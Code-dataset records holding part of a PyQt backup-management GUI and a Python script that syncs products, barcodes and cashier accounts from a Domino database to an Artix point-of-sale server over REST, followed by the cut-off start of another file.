MoreFullBackupWindow, RestoreFullBackupWindow, MoreIncBackupWindow, CreateIncBackupWindow, \\\n RestoreIncBackupWindow\nexcept ImportError as e:\n print(f'package not found\\n{e}\\n')\n\ntry:\n import sqlite3\nexcept ImportError as e:\n print(f'package not found\\n{e}\\n')\n\n\ndef getContentBackup(self):\n global con\n global cur\n con = sqlite3.connect('backup/backupshistory.db')\n cur = con.cursor()\n\n self.gridBackup = QGridLayout()\n self.gridBackup.setColumnMinimumWidth(1100, 1100)\n self.titlefullbackup = QLabel('Full Backups : ')\n self.titleincbackup = QLabel('Incremental Backups : ')\n self.titlefullbackup.setStyleSheet(\"color: #303a46;font: bold 14px;\")\n self.titleincbackup.setStyleSheet(\"color: #303a46;font: bold 14px;\")\n\n createTableFullBackup(self)\n createTableIncBackup(self)\n\n createFullBackupButtons(self)\n createIncBackupButtons(self)\n\n self.containerBackup = QVBoxLayout()\n\n self.containerBackup.addLayout(self.gridBackup)\n self.containerBackup.addLayout(self.hboxfullbackupbtn)\n self.containerBackup.addWidget(self.tableFullBackup)\n self.containerBackup.addLayout(self.hboxincbackupbtn)\n self.containerBackup.addWidget(self.tableIncBackup)\n\n self.bottomRightLayout.addLayout(self.containerBackup)\n\n\ndef createTableFullBackup(self):\n self.tableFullBackup = QTableWidget()\n self.tableFullBackup.setRowCount(0)\n self.tableFullBackup.setColumnCount(8)\n\n header = self.tableFullBackup.horizontalHeader()\n header.setStretchLastSection(True)\n\n self.tableFullBackup.setHorizontalHeaderItem(0, QTableWidgetItem(\"Backup ID\"))\n self.tableFullBackup.setHorizontalHeaderItem(1, QTableWidgetItem(\"Backup Date\"))\n self.tableFullBackup.setHorizontalHeaderItem(2, QTableWidgetItem(\"Backup Name\"))\n self.tableFullBackup.setHorizontalHeaderItem(3, QTableWidgetItem(\"Source Path\"))\n self.tableFullBackup.setHorizontalHeaderItem(4, QTableWidgetItem(\"Destination Path\"))\n self.tableFullBackup.setHorizontalHeaderItem(5, QTableWidgetItem(\"Excluded Items\"))\n self.tableFullBackup.setHorizontalHeaderItem(6, QTableWidgetItem(\"More\"))\n self.tableFullBackup.setHorizontalHeaderItem(7, QTableWidgetItem(\"Select\"))\n self.tableFullBackup.setEditTriggers(QAbstractItemView.NoEditTriggers)\n showmyfullbackuplist(self)\n\n\ndef updateTableFullBackup(self):\n try:\n self.tableFullBackup.setRowCount(0)\n self.rowposition = 0\n showmyfullbackuplist(self)\n except Exception:\n return None\n\n\ndef createFullBackupButtons(self):\n self.hboxfullbackupbtn = QHBoxLayout()\n self.addFullBackupBtn = QPushButton('Add')\n self.restoreFullBackupBtn = QPushButton('Restore')\n self.deleteFullBackupBtn = QPushButton('Delete')\n self.addFullBackupBtn.setFixedHeight(30)\n self.addFullBackupBtn.setFixedWidth(120)\n self.restoreFullBackupBtn.setFixedHeight(30)\n self.restoreFullBackupBtn.setFixedWidth(120)\n self.deleteFullBackupBtn.setFixedHeight(30)\n self.deleteFullBackupBtn.setFixedWidth(120)\n self.addFullBackupBtn.clicked.connect(lambda: createFullBackupWindow(self))\n self.addFullBackupBtn.setStyleSheet(\"color: #ecf0f1; background-color: #2ecc71 ; border: 0px solid #2c3e50\")\n self.restoreFullBackupBtn.clicked.connect(lambda: restoreFullBackupWindow(self, self.fullbackupdic))\n self.restoreFullBackupBtn.setStyleSheet(\"color: #ecf0f1; background-color: #34495e ; border: 0px solid #2c3e50\")\n self.deleteFullBackupBtn.clicked.connect(lambda: deleteFullBackupWindow(self, self.fullbackupdic))\n self.deleteFullBackupBtn.setStyleSheet(\"color: #ecf0f1; background-color: #e74c3c; border: 0px solid #2c3e50\")\n self.selectall = SelectAllFullBackupButton(self.fullbackupdic)\n self.hboxfullbackupbtn.addWidget(self.titlefullbackup)\n self.hboxfullbackupbtn.addWidget(self.selectall)\n self.hboxfullbackupbtn.addStretch()\n self.hboxfullbackupbtn.addWidget(self.restoreFullBackupBtn)\n self.hboxfullbackupbtn.addWidget(self.addFullBackupBtn)\n self.hboxfullbackupbtn.addWidget(self.deleteFullBackupBtn)\n\n\nclass SelectCellInTableFullBackup(QWidget):\n def __init__(self, parent=None):\n super(SelectCellInTableFullBackup, self).__init__(parent)\n self.isSelected = False\n self.hbox = QHBoxLayout()\n self.checkb = QCheckBox(self)\n self.checkb.stateChanged.connect(self.checkBoxChangedAction)\n self.hbox.addStretch()\n self.hbox.addWidget(self.checkb)\n self.hbox.addStretch()\n self.hbox.setContentsMargins(0, 0, 0, 0)\n self.hbox.setSpacing(8)\n self.setLayout(self.hbox)\n\n def checkBoxChangedAction(self, state):\n if (QtCore.Qt.Checked == state):\n self.isSelected = True\n else:\n self.isSelected = False\n\n\nclass SelectAllFullBackupButton(QWidget):\n def __init__(self, d, parent=None):\n super(SelectAllFullBackupButton, self).__init__(parent)\n self.dd = d\n self.selectAllIsSelected = False\n self.hbox = QHBoxLayout()\n self.selectall = QCheckBox('Select/Deselect All', self)\n self.selectall.stateChanged.connect(self.selectAllChangedAction)\n self.hbox.addWidget(self.selectall)\n self.hbox.setContentsMargins(0, 0, 0, 0)\n self.hbox.setSpacing(8)\n self.setLayout(self.hbox)\n\n def selectAllChangedAction(self, state):\n if (QtCore.Qt.Checked == state):\n self.selectallIsSelected = True\n for i in self.dd:\n self.dd[i].isSelected = True\n self.dd[i].checkb.setChecked(True)\n else:\n self.selectallIsSelected = False\n for i in self.dd:\n self.dd[i].isSelected = False\n self.dd[i].checkb.setChecked(False)\n\n\nclass moreCellInTableFullBackup(QWidget):\n def __init__(self, id, parent=None):\n super(moreCellInTableFullBackup, self).__init__(parent)\n self.id = id\n self.hbox = QHBoxLayout()\n self.showmoreBtn = QPushButton('more')\n self.showmoreBtn.clicked.connect(self.showmoreBtnClicked)\n self.hbox.addWidget(self.showmoreBtn)\n self.hbox.addStretch()\n self.hbox.setContentsMargins(0, 0, 0, 0)\n self.hbox.setSpacing(8)\n self.setLayout(self.hbox)\n\n def showmoreBtnClicked(self):\n self.setCursor(Qt.WaitCursor)\n self.secondwindow = MoreFullBackupWindow(self.id)\n self.sw = qtmodern.windows.ModernWindow(self.secondwindow)\n self.sw.show()\n self.setCursor(Qt.ArrowCursor)\n\n\ndef showmyfullbackuplist(self):\n self.fullBackupList = retrievedatafromdbfullbackup()\n self.fullbackupdic = {}\n self.fullbackupdic2 = {}\n self.rowposition = 0\n for i in self.fullBackupList:\n self.rowPosition = self.tableFullBackup.rowCount()\n self.tableFullBackup.insertRow(self.rowPosition)\n self.tableFullBackup.setItem(self.rowPosition, 0, QTableWidgetItem(i[0]))\n self.tableFullBackup.setItem(self.rowPosition, 1, QTableWidgetItem(i[1]))\n self.tableFullBackup.setItem(self.rowPosition, 2, QTableWidgetItem(i[2]))\n self.tableFullBackup.setItem(self.rowPosition, 3, QTableWidgetItem(i[3]))\n self.tableFullBackup.setItem(self.rowPosition, 4, QTableWidgetItem(i[4]))\n self.tableFullBackup.setItem(self.rowPosition, 5, QTableWidgetItem(i[5]))\n self.fullbackupdic[i[0]] = SelectCellInTableFullBackup()\n self.fullbackupdic2[i[0]] = moreCellInTableFullBackup(i[0])\n self.tableFullBackup.setCellWidget(self.rowPosition, 6, self.fullbackupdic2[i[0]])\n self.tableFullBackup.setCellWidget(self.rowPosition, 7, self.fullbackupdic[i[0]])\n\n\ndef retrievedatafromdbfullbackup():\n global cur\n listfullbackups = []\n query = \"SELECT * FROM FullBackups\"\n fullbackups = cur.execute(query).fetchall()\n for fullbackup in fullbackups:\n listfullbackups.append(\n [str(fullbackup[0]), str(fullbackup[1]), str(fullbackup[2]), str(fullbackup[3]), str(fullbackup[4]),\n str(fullbackup[5])])\n return listfullbackups\n\n\ndef createFullBackupWindow(self):\n self.secondwindow = CreateFullBackupWindow()\n self.sw = qtmodern.windows.ModernWindow(self.secondwindow)\n self.sw.show()\n\n\ndef restoreFullBackupWindow(self, d):\n list_fullbackup_to_restore = []\n for i in d:\n if d[i].isSelected == True:\n list_fullbackup_to_restore.append(i)\n if len(list_fullbackup_to_restore) == 0 or len(list_fullbackup_to_restore) > 1:\n QMessageBox.warning(self, 'warning', 'Please select just one full backup')\n else:\n self.secondwindow = RestoreFullBackupWindow(list_fullbackup_to_restore[0])\n self.sw = qtmodern.windows.ModernWindow(self.secondwindow)\n self.sw.show()\n\n\ndef deleteFullBackupWindow(self, d):\n list_fullbackups_to_delete = []\n for i in d:\n if d[i].isSelected == True:\n list_fullbackups_to_delete.append(i)\n if len(list_fullbackups_to_delete) == 0:\n QMessageBox.warning(self, 'warning', 'no selected full backups.\\nPlease select at least one full backup')\n else:\n self.secondwindow = DeleteFullBackupWindow(list_fullbackups_to_delete)\n self.sw = qtmodern.windows.ModernWindow(self.secondwindow)\n self.sw.show()\n\n\ndef createTableIncBackup(self):\n self.tableIncBackup = QTreeWidget()\n labels = ['Meta Name', 'Backup ID', 'Backup Level', 'Backup Date', 'Backup Name', 'Backup Path', 'Destination Path',\n 'Excluded Items', 'More', 'Select']\n self.tableIncBackup.setHeaderLabels(labels)\n\n self.tableIncBackup.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)\n self.tableIncBackup.setEditTriggers(QAbstractItemView.NoEditTriggers)\n showmyincbackuplist(self)\n\n\ndef createIncBackupButtons(self):\n self.hboxincbackupbtn = QHBoxLayout()\n self.addIncBackupBtn = QPushButton('Add')\n self.restoreIncBackupBtn = QPushButton('Restore')\n self.deleteIncBackupBtn = QPushButton('Delete')\n self.addIncBackupBtn.setFixedHeight(30)\n self.addIncBackupBtn.setFixedWidth(120)\n self.restoreIncBackupBtn.setFixedHeight(30)\n self.restoreIncBackupBtn.setFixedWidth(120)\n self.deleteIncBackupBtn.setFixedHeight(30)\n self.deleteIncBackupBtn.setFixedWidth(120)\n self.addIncBackupBtn.clicked.connect(lambda: createIncBackupWindow(self))\n self.addIncBackupBtn.setStyleSheet(\"color: #ecf0f1; background-color: #2ecc71 ; border: 0px solid #2c3e50\")\n self.restoreIncBackupBtn.clicked.connect(lambda: restoreIncBackupWindow(self))\n self.restoreIncBackupBtn.setStyleSheet(\"color: #ecf0f1; background-color: #34495e ; border: 0px solid #2c3e50\")\n self.deleteIncBackupBtn.clicked.connect(lambda: deleteIncBackupWindow(self, self.incbackupdic))\n self.deleteIncBackupBtn.setStyleSheet(\"color: #ecf0f1; background-color: #e74c3c; border: 0px solid #2c3e50\")\n self.selectallinc = SelectAllIncBackupButton(self.incbackupdic)\n self.hboxincbackupbtn.addWidget(self.titleincbackup)\n self.hboxincbackupbtn.addWidget(self.selectallinc)\n self.hboxincbackupbtn.addStretch()\n self.hboxincbackupbtn.addWidget(self.restoreIncBackupBtn)\n self.hboxincbackupbtn.addWidget(self.addIncBackupBtn)\n self.hboxincbackupbtn.addWidget(self.deleteIncBackupBtn)\n\n\nclass SelectCellInTableIncBackup(QWidget):\n def __init__(self, parent=None):\n super(SelectCellInTableIncBackup, self).__init__(parent)\n self.isSelected = False\n self.hbox = QHBoxLayout()\n self.checkb = QCheckBox(self)\n self.checkb.stateChanged.connect(self.checkBoxChangedAction)\n self.hbox.addStretch()\n self.hbox.addWidget(self.checkb)\n self.hbox.addStretch()\n self.hbox.setContentsMargins(0, 0, 0, 0)\n self.hbox.setSpacing(8)\n self.setLayout(self.hbox)\n\n def checkBoxChangedAction(self, state):\n if (QtCore.Qt.Checked == state):\n self.isSelected = True\n else:\n self.isSelected = False\n\n\nclass SelectAllIncBackupButton(QWidget):\n def __init__(self, d, parent=None):\n super(SelectAllIncBackupButton, self).__init__(parent)\n self.dd = d\n self.selectAllIsSelected = False\n self.hbox = QHBoxLayout()\n self.selectall = QCheckBox('Select/Deselect All', self)\n self.selectall.stateChanged.connect(self.selectAllChangedAction)\n self.hbox.addWidget(self.selectall)\n self.hbox.setContentsMargins(0, 0, 0, 0)\n self.hbox.setSpacing(8)\n self.setLayout(self.hbox)\n\n def selectAllChangedAction(self, state):\n if (QtCore.Qt.Checked == state):\n self.selectallIsSelected = True\n for i in self.dd:\n self.dd[i].isSelected = True\n self.dd[i].checkb.setChecked(True)\n else:\n self.selectallIsSelected = False\n for i in self.dd:\n self.dd[i].isSelected = False\n self.dd[i].checkb.setChecked(False)\n\n\nclass moreCellInTableIncBackup(QWidget):\n def __init__(self, id, parent=None):\n super(moreCellInTableIncBackup, self).__init__(parent)\n self.id = id\n self.hbox = QHBoxLayout()\n self.showmoreBtn = QPushButton('more')\n self.showmoreBtn.clicked.connect(self.showmoreBtnClicked)\n self.hbox.addWidget(self.showmoreBtn)\n self.hbox.addStretch()\n self.hbox.setContentsMargins(0, 0, 0, 0)\n self.hbox.setSpacing(8)\n self.setLayout(self.hbox)\n\n def showmoreBtnClicked(self):\n self.setCursor(Qt.WaitCursor)\n self.secondwindow = MoreIncBackupWindow(self.id)\n self.sw = qtmodern.windows.ModernWindow(self.secondwindow)\n self.sw.show()\n self.setCursor(Qt.ArrowCursor)\n\n\ndef showmyincbackuplist(self):\n global cur\n self.incBackupList = retrievedatafromdbincbackup()\n self.incbackupdic = {}\n self.incbackupdic2 = {}\n for i in self.incBackupList:\n query = \"SELECT * FROM IncrementalBackups WHERE metaname=?\"\n incbackups = cur.execute(query, (i,)).fetchall()\n item1 = QTreeWidgetItem(self.tableIncBackup, [i])\n for incbackup in incbackups:\n tmplist = ['', str(incbackup[0]), str(incbackup[2]), str(incbackup[3]), str(incbackup[4]),\n str(incbackup[5]), str(incbackup[6]), str(incbackup[7])]\n subitem1 = QTreeWidgetItem(item1, tmplist)\n\n self.incbackupdic2[incbackup[0]] = moreCellInTableIncBackup(incbackup[0])\n self.tableIncBackup.setItemWidget(subitem1, 8, self.incbackupdic2[incbackup[0]])\n\n self.incbackupdic[incbackup[0]] = SelectCellInTableIncBackup()\n self.tableIncBackup.setItemWidget(subitem1, 9, self.incbackupdic[incbackup[0]])\n\n\ndef retrievedatafromdbincbackup():\n global cur\n listincbackups = []\n query = \"SELECT DISTINCT metaname FROM IncrementalBackups ORDER BY ROWID ASC\"\n incbackups = cur.execute(query).fetchall()\n for incbackup in incbackups:\n listincbackups.append(str(incbackup[0]))\n return listincbackups\n\n\ndef createIncBackupWindow(self):\n incBackupList = retrievedatafromdbincbackup()\n self.secondwindow = CreateIncBackupWindow(incBackupList)\n self.sw = qtmodern.windows.ModernWindow(self.secondwindow)\n self.sw.show()\n\n\ndef restoreIncBackupWindow(self):\n incBackupList = retrievedatafromdbincbackup()\n self.secondwindow = RestoreIncBackupWindow(incBackupList)\n self.sw = qtmodern.windows.ModernWindow(self.secondwindow)\n self.sw.show()\n\n\ndef deleteIncBackupWindow(self, d):\n list_incbackups_to_delete = []\n for i in d:\n if d[i].isSelected == True:\n list_incbackups_to_delete.append(str(i))\n if len(list_incbackups_to_delete) == 0:\n QMessageBox.warning(self, 'warning',\n 'no selected incremental backups.\\nPlease select at least one incremental backup')\n else:\n self.secondwindow = DeleteIncBackupWindow(list_incbackups_to_delete)\n self.sw = qtmodern.windows.ModernWindow(self.secondwindow)\n self.sw.show()\n","repo_name":"flyflyinit/GUI-admin-tool","sub_path":"project/backup/mainbackup.py","file_name":"mainbackup.py","file_ext":"py","file_size_in_byte":16894,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"29382232739","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport httplib2\nimport urllib\nimport base64\nimport json\nimport time\nfrom pydomino import Alias,local_store\nfrom xml.dom.minidom import parse\nfrom sys import argv,exit,version_info\nfrom os import system,getpid,path\nfrom socket import gethostname\nfrom datetime import datetime,timedelta\nfrom fcntl import flock,LOCK_EX,LOCK_NB,LOCK_UN,LOCK_SH\n\nlock_file=\"/tmp/load_handbook.lock\"\nsend_error_programm = \"/usr/local/domino/bin/send-error-message\"\nARTIX_UNPACK_PRICE_INDEX=50\nDOMINO_PROTOCOL_PRODUCT_PREFIX=\"ТОВАР.\"\nDOMINO_RETAIL_PRICE_INDEX=4\nDOMINO_BASE_CODE_LEN=5\nDOMINO_CASHIER_REGION=\"CAS\"\nDOMINO_KEYBOARD_TYPE=\"GR\"\nARTIX_PRODUCT_CODE_PREFIX=\"DC\"\nARTIX_CASHIER_PASSWORD_MASK=\";%s=1?\"\nARTIX_ROLES={\"1\":\"5\",\"2\":\"6\",\"4\":\"2\",\"8\":\"4\"}\ndomino_units = {\"АМПЛ\":1,\n\"БЛСТ\":2,\n\"ДРЖ.\":3,\n\"КАПС\":4,\n\"КАРП\":5,\n\"ПАК.\":6,\n\"ПАРА\":7,\n\"ПОР.\":8,\n\"СВЕЧ\":9,\n\"ТАБ.\":10,\n\"ТУБА\":11,\n\"ТЮБ.\":12,\n\"УПАК\":13,\n\"ФЛ.\":14,\n\"ШТ\":15}\n\n\nclass ArtixExchange:\n\tdef __init__(self,shopcode,hostname,port=28080,user=\"admin\",password=\"admin\"):\n\t\tself.host=hostname\n\t\tself.shopcode=shopcode\n\t\tself.user=user\n\t\tself.port=port\n\t\tself.password=password\n\tdef send(self,commands):\n\t\tif version_info < (3,):\n\t\t\tlogin = b\"%s:%s\"%(self.user,self.password)\n\t\telse:\n\t\t\tlogin = bytes(\"%s:%s\"%(self.user,self.password), 'utf-8')\n\t\thttp = httplib2.Http(\".cache\")\n\t\tbase64string = base64.encodestring(login)\n\t\tstr_=base64string.decode(\"utf-8\")\n\t\tauthheader = \"Basic %s\" % str_\n\t\tjsonHeader = {'Content-Type':'application/json', \"Accept\": \"application/json\", \"Authorization\": authheader}\n\t\tmethod = 'POST'\n\t\tdictionaryId = str(time.time())\n\t\turl = 'http://%s:%s/aifexchange/loaddicts?shopcode=%s&dictionaryid=%s' % (self.host, self.port, self.shopcode, dictionaryId)\n\t\tbody = json.dumps(commands)\n\t\tanswer = None\n\t\ttry:\n\t\t\tresponse, content = http.request(url, method, headers=jsonHeader, body=body)\n\t\t\tif response.status == 200:\n\t\t\t\tanswer = json.loads(content.decode(\"cp1251\"))\n\t\t\telse: print(\"status\",response.status)\n\t\texcept: pass\n\t\treturn answer and answer['success']\n\ndef send_error(msg):\n\tprint(\"Error: %s\"%(msg))\n\tsystem(\"%s \\\"%s %s: %s\\\"\"%(send_error_programm,gethostname(),argv[0],msg))\n\texit(1)\n\ndef add_units():\n\tcommands=[]\n\tfor i in domino_units:\n\t\tcommands.append({\n\t\t\"command\":\"addUnit\",\n \"unit\":{\n \"unitCode\":domino_units[i],\n \"name\":i,\n \"fractional\":False\n }})\n\treturn commands\ndef get_barcode(product,barcode):\n\tbar={\"barcode\": barcode.barcode,\"cquant\": product.coef}\n\tif product.coef > 1:\n\t\tbar[\"measureCode\"]=domino_units[product.tech_unit]\n\t\tbar[\"packingmeasure\"]=domino_units[product.unit]\n\t\tbar[\"packingprice\"]=product.price(DOMINO_RETAIL_PRICE_INDEX)\n\t\tbar[\"price\"]=product.price(DOMINO_RETAIL_PRICE_INDEX)*product.coef\n\t\tbar[\"cquant\"]=product.coef\n\treturn bar\ndef get_product(product,barcode,barcodekey,store_pref):\n\tif not product.price(DOMINO_RETAIL_PRICE_INDEX): return None\n\tif product.is_parcel and product.code[6:8] != store_pref: return None\n\tbarcodekey.set_code(product.code)\n\tif not barcode.get_equal(barcodekey): return None\n\tdata = {\"inventcode\":(not product.is_parcel and ARTIX_PRODUCT_CODE_PREFIX or \"\") + product.code,\n\t\t\t\"measureCode\":domino_units[product.unit],\n\t\t\t\"isInventItem\":True,\n\t\t\t\"price\":product.price(DOMINO_RETAIL_PRICE_INDEX),\n\t\t\t\"barcodes\":[get_barcode(product,barcode)],\n\t\t\t\"cquant\": 1,\n\t\t\t\"name\": product.name}\n\tk=barcodekey.clone()\n\twhile barcode.get_next(barcodekey):\n\t\tif k.cmp(barcodekey,1): break\n\t\tdata[\"barcodes\"].append(get_barcode(product,barcode))\n\treturn data\ndef add_product(product,barcode,barcodekey,mstore):\n\tstore_pref=\"%2.2d\"%(int(mstore))\n\tdata = get_product(product,barcode,barcodekey,store_pref)\n\tif not data: return None\n\treturn {\"command\":\"addInventItem\", \n\t\t\t \"invent\":data}\ndef add_invent(alias,mstore,code):\n\tproductkey,product=alias.ProductKey4(),alias.Product()\n\tbarcodekey,barcode=alias.BarcodeKey1(),alias.Barcode()\n\tproductkey.set_code(code)\n\tcommands = []\n\tif not product.get_equal(productkey): \n\t\treturn commands\n\tcommand = add_product(product,barcode,barcodekey,mstore)\n\tif command: commands.append(command)\n\tif not product.is_parcel:\n\t\twhile product.get_next(productkey):\n\t\t\tif product.code[:DOMINO_BASE_CODE_LEN] != code: break\n\t\t\tcommand = add_product(product,barcode,barcodekey,mstore)\n\t\t\tif command: commands.append(command)\n\treturn commands\ndef add_invents(alias,mstore):\n\tproductkey,product=alias.ProductKey4(),alias.Product()\n\tbarcodekey,barcode=alias.BarcodeKey1(),alias.Barcode()\n\tres = []\n\tproductkey.set([\"\"])\n\tb = product.get_ge(productkey)\n\ti = 0\n\twhile b:\n\t\tcom = add_product(product,barcode,barcodekey,mstore)\n\t\tif com:\n\t\t\tres.append(com)\n\t\ti+=1\n\t\tif not i % 100: print(i)\n\t\t#if i > 100: break\n\t\tb = product.get_next(productkey)\n\treturn res\ndef add_users(alias,mstore):\n\tres=[]\n\tpartner,k=alias.Partner(),alias.PartnerKey0()\n\tk.set([DOMINO_CASHIER_REGION,0])\n\tk1=k.clone()\n\tb=partner.get_ge(k)\n\twhile b:\n\t\tif k1.cmp(k,1): break\n\t\tstore=partner.store\n\t\tif store == mstore:\n\t\t\tdata=add_user(partner=partner)\n\t\t\tif data:\n\t\t\t\tres += data\n\t\tb=partner.get_next(k)\n\treturn res\ndef add_user(alias=None,partner=None,code=None):\n\tif not partner:\n\t\tpartner,k=alias.Partner(),alias.PartnerKey0()\n\t\tk.set([DOMINO_CASHIER_REGION,code])\n\t\tif not partner.get_equal(k):\n\t\t\treturn None\n\trole = partner.param(\"ПРО_ROLE\")\n\tif role not in ARTIX_ROLES: return None\n\treturn [{\n \"command\":\"addMCashUser\", \n \"mcashuser\":\n {\"code\":str(partner.code),\n \"name\":partner.name,\n \"login\":str(partner.code),\n \"password\":ARTIX_CASHIER_PASSWORD_MASK%(partner.param(\"ПРО_LOGIN\")),\n \"roleusers\":\n [{\"rolecode\":ARTIX_ROLES[role],\n \"rule\":\"1\"}]}}]\ndef getText(nodelist):\n\trc = []\n\tfor node in nodelist:\n\t\tif node.nodeType == node.TEXT_NODE:\n\t\t\trc.append(node.data)\n\treturn ''.join(rc)\ndef getValue(elemlist):\n\ttry:\n\t\treturn getText(elemlist[0].childNodes)\n\texcept:\n\t\treturn None\ndef nodeElementText(elem,name):\n\treturn getValue(elem.getElementsByTagName(name))\nclass KeyboardValue:\n\tkeycode=0\n\tcmactioncode=0\n\tkeyvalue=\"\"\n\tcontext=\"allcontext\"\n\tdef __init__(self,elem):\n\t\tself.keycode = int(nodeElementText(elem.getElementsByTagName(\"pk\")[0],\"keycode\"))\n\t\tself.cmactioncode=int(nodeElementText(elem,\"cmactioncode\"))\n\t\tself.keyvalue=nodeElementText(elem,\"keyvalue\")\n\t\tself.context=nodeElementText(elem,\"context\")\n\tdef __str__(self):\n\t\treturn \"\"\"\n\"kbkey\":{\n \"keycode\":%d,\n \"cmactioncode\":%d,\n \"keyvalue\":\"%s\",\n \"context\":\"%s\"\n }\"\"\"%(self.keycode,self.cmactioncode,self.keyvalue,self.context)\ndef load_func_keys_from_file(filename):\n\tdom = parse(filename)\n\tres = []\n\tfor elem in dom.getElementsByTagName(\"domainCollection\"):\n\t\tif elem.getAttribute(\"xsi:type\") == \"kbkey\":\n\t\t\tk = KeyboardValue(elem)\n\t\t\tres.append(k)\n\treturn res\ndef add_func_keys(filename):\n\tres = []\n\tfor l in load_func_keys_from_file(filename):\n\t\tres.append({\n \"command\":\"addKbKey\",\n \"kbkey\":{\n \"keycode\":l.keycode,\n \"cmactioncode\":l.cmactioncode,\n \"keyvalue\":l.keyvalue,\n \"context\":l.context}})\n\treturn res\ndef add_invent_keys(alias,mstore):\n\tdocument,dkey=alias.Document(),alias.DocumentKey0()\n\torder,okey=alias.DocumentOrder(),alias.DocumentOrderKey0()\n\tdkey.set([DOMINO_KEYBOARD_TYPE,mstore,\"\"])\n\tk1=dkey.clone()\n\tkp,pp=alias.ProductKey4(),alias.Product()\n\tres = []\n\tb=document.get_ge(dkey)\n\twhile b:\n\t\tif k1.cmp(dkey,2): break\n\t\tif document.param(\"404\") in [\"1\",\"2\"]:\n\t\t\tcodes = []\n\t\t\tif document.param(\"ТОВАР\"): \n\t\t\t\tcode1=document.param(\"ТОВАР\")\n\t\t\t\tkp.set([code1])\n\t\t\t\tif pp.get_equal(kp) and pp.price(4):\n\t\t\t\t\tcodes.append(ARTIX_PRODUCT_CODE_PREFIX+code1)\n\t\t\t\telse:\n\t\t\t\t\tprint(code1)\n\t\t\tokey.set(document)\n\t\t\tokey.set_line(0)\n\t\t\tk=okey.clone()\n\t\t\tb = order.get_ge(okey)\n\t\t\twhile b:\n\t\t\t\tif k.cmp(okey,3): break\n\t\t\t\tkp.set([order.code])\n\t\t\t\tif pp.get_equal(kp) and pp.price(4):\n\t\t\t\t\tcodes.append(ARTIX_PRODUCT_CODE_PREFIX+order.code)\n\t\t\t\telse:\n\t\t\t\t\tprint(order.code)\n\t\t\t\tb = order.get_next(okey)\n\t\t\tres.append({\"hotkey\": {\n\t\t\t\t\t\t\"hotkeycode\": int(document.document),\n\t\t\t\t\t\t\"hotkeyname\": document.param(\"420\"),\n\t\t\t\t\t\t\"inventcodes\":codes\n\t\t\t\t\t },\n\t\t\t\t\t\t\"command\": \"addHotKey\"})\n\t\tb=document.get_next(dkey)\n\treturn res\ndef get_list_update(alias,name):\n\tlast = datetime.now()\n\tk,p=alias.ProtocolKey2(),alias.Protocol()\n\tk.set([name,last,last])\n\tb=p.get_le(k)\n\tif not b or p.user_name != name or datetime.combine(p.date,p.time) < last+timedelta(days=-2) : return None,None\n\tret=[]\n\tk=alias.ProtocolKey1()\n\tlast = datetime.combine(p.date,p.time)+timedelta(seconds=-50)\n\tk.set([last,last])\n\tb=p.get_ge(k)\n\twhile b:\n\t\tif p.object_name[:len(DOMINO_PROTOCOL_PRODUCT_PREFIX)] == DOMINO_PROTOCOL_PRODUCT_PREFIX:\n\t\t\tcode = p.object_name[len(DOMINO_PROTOCOL_PRODUCT_PREFIX):len(DOMINO_PROTOCOL_PRODUCT_PREFIX)+5]\n\t\t\tif code not in ret:\n\t\t\t\tret.append(code)\n\t\tlast = datetime.combine(p.date,p.time)\n\t\tb=p.get_next(k)\n\treturn ret,last\ndef set_last(alias,name,last):\n\tp=alias.Protocol()\n\tp.set_object_name(\"EXCHANGE\")\n\tp.set_user_name(name)\n\tp.set_date(last)\n\tp.set_time(last)\n\tp.insert()\ndef add_updates(alias,mstore,username):\n\tcodes,last = get_list_update(alias,username)\n\tnow=datetime.now()\n\tret = []\n\tif not last:\n\t\tret += [{\"command\": \"clearInventory\"}]\n\t\tret += add_units()\n\t\tret += add_invents(a,store)\n\telif codes:\n\t\tprint(\"%s: Данные с %s необходимо обновить %d тов.\"%(datetime.now().strftime(\"%d/%m/%y %H:%M:%S\"),last.strftime(\"%d/%m/%y %H:%M:%S\"),len(codes)))\n\t\tfor code in codes:\n\t\t\tr = add_invent(alias,mstore,code)\n\t\t\tif r:\n\t\t\t\tret += r\n\treturn ret,now\ndef lock(filename):\n\ttry:\n\t\tif path.isfile(filename):\n\t\t\tflock(open(filename,\"r\"),LOCK_EX | LOCK_NB)\n\texcept:\n\t\ttry:\n\t\t\td=int(open(filename,\"r\").read()) or -999\n\t\texcept: d=-999\n\t\treturn d\n\topen(filename,\"w\").write(\"%d\"%(getpid()))\n\tglobal h\n\th=open(filename,\"r\")\n\tflock(h,LOCK_EX)\n\treturn 0\nif __name__ == \"__main__\":\n\tpid=lock(lock_file)\n\tif pid: \n\t\tprint(\"lock by proccess %d\"%(pid))\n\t\texit(1)\n\ta=Alias()\n\tstore=local_store()\n\tartix=ArtixExchange(store,\"kassa-99\")\n\tusername=gethostname()\n\tlast=None\n\tcommands = []\n\t#last = get_protocols(a,)\n\tlen_=len(argv)\n\tif len_ not in [2,3] or (len_ == 2 and argv[1] not in [\"products\",\"cashiers\",\"updates\"]) or (len_ == 3 and argv[1] not in [\"product\"]):\n\t\tsend_error(\"Неправильный параметр %s\"(argv))\n\tif len_ == 1 or (len_ == 2 and argv[1] == \"updates\"):\n\t\tret,last = add_updates(a,store,username)\n\t\tcommands += ret\n\telif argv[1] == \"products\":\n\t\tlast = datetime.now()\n\t\tcommands += [{\"command\": \"clearInventory\"}]\n\t\tcommands += add_units()\n\t\tcommands += add_invents(a,store)\n\telif argv[1] == \"cashiers\":\n\t\tcommands += [{\"command\": \"clearMCashUser\"}]\n\t\tcommands += add_users(a,store)\n\telif argv[1] == \"product\":\n\t\tcommands += add_invent(a,store,argv[2])\n\tif commands:\n\t\tif not artix.send(commands):\n\t\t\tsend_error(\"Ошибка обновления справочников\")\n\t\telse:\n\t\t\tif last:\n\t\t\t set_last(a,username,last)\n\t\t\tprint(\"ok\")\n\t#else:\n\t#\tprint(\"empty ok\")\n","repo_name":"mirror-partorg/domino","sub_path":"domino/src/artix.rest/load-handbook.py","file_name":"load-handbook.py","file_ext":"py","file_size_in_byte":11153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"69899076199","text":"import dataclasses\nimport heapq\nfrom enum import Enum\nfrom typing import Callable, Dict, List, NewType, Set\n\nimport numpy as np\nimport tqdm\n\nfrom lib.common.feature import Feature\n\n# Interface definition of a matching function.\nScoreFunction = NewType(\"ScoreFunction\", Callable[[Feature, 